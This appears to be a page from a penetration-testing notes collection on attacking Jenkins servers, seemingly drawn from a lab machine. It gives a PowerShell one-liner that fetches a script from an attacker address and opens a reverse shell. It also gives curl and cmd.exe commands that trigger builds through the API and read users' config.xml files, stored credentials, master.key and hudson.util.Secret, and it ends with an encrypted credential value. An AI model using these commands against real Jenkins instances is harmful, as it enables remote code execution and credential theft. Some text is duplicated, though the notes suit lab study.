Jenkins

If admin

Goto Crete task make a new task add a build step as windows batch command..

test using whoami

or for reverse shell

powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443

if not a admin

User seems to have overall create,read,delete permissions. As we can't trigger builds from UI, we can try to do it from the Jenkins API. Let's click on Configure > Build Triggers > Trigger builds remotely and enter an authentication token of your choice, for example test . Now click on Build > Add build step > Execute a windows batch command and enter whoami . Now on the top right click on user icon and navigate to Configure.

Click on Add new Token and enter the token that we created earlier. Click on generate and copy the generated token. Using this token we can trigger the earlier configured job.

curl http://test:@10.129.95.232:8080/job//build?token=test

We can attempt to read the credentials.xml file, in case any credentials have been added to Jenkins. It's plausible that the master server will hold SSH keys, AWS secrets, and user credentials among other sensitive files. We can see the Jenkins path from the earlier build result. Let's see if there are any secrets stored by the users. To do this modify earlier build command as follows and trigger the build using cURL. We see our user and admin users folders. Let's check the contents of config.xml inside the admin folder. This reveals that the credentials of user oliver are stored on Jenkins. Save this file as credentials.xml on your machine. Now let's retrieve master.key and hudson.util.Secret from secrets folder.

cmd.exe /c "dir c:\Users\oliver\Appdata\local\jenkins\.jenkins\users"

We see our user and admin users folders. Let's check the contents of config.xml inside the admin folder. This reveals that the credentials of user oliver are stored on Jenkins. Save this file as credentials.xml on your machine. Now let's retrieve master.key and hudson.util.Secret from secrets folder.

cmd.exe /c "dir c:\Users\oliver\Appdata\local\jenkins.jenkins\users"

cmd.exe /c "type C:\Users\oliver\Appdata\local\jenkins\.jenkins\users\admin_17207690984073220035\config. xml"

oliver {AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=} false

PreviousKnown ExploitNextDrupal

Last updated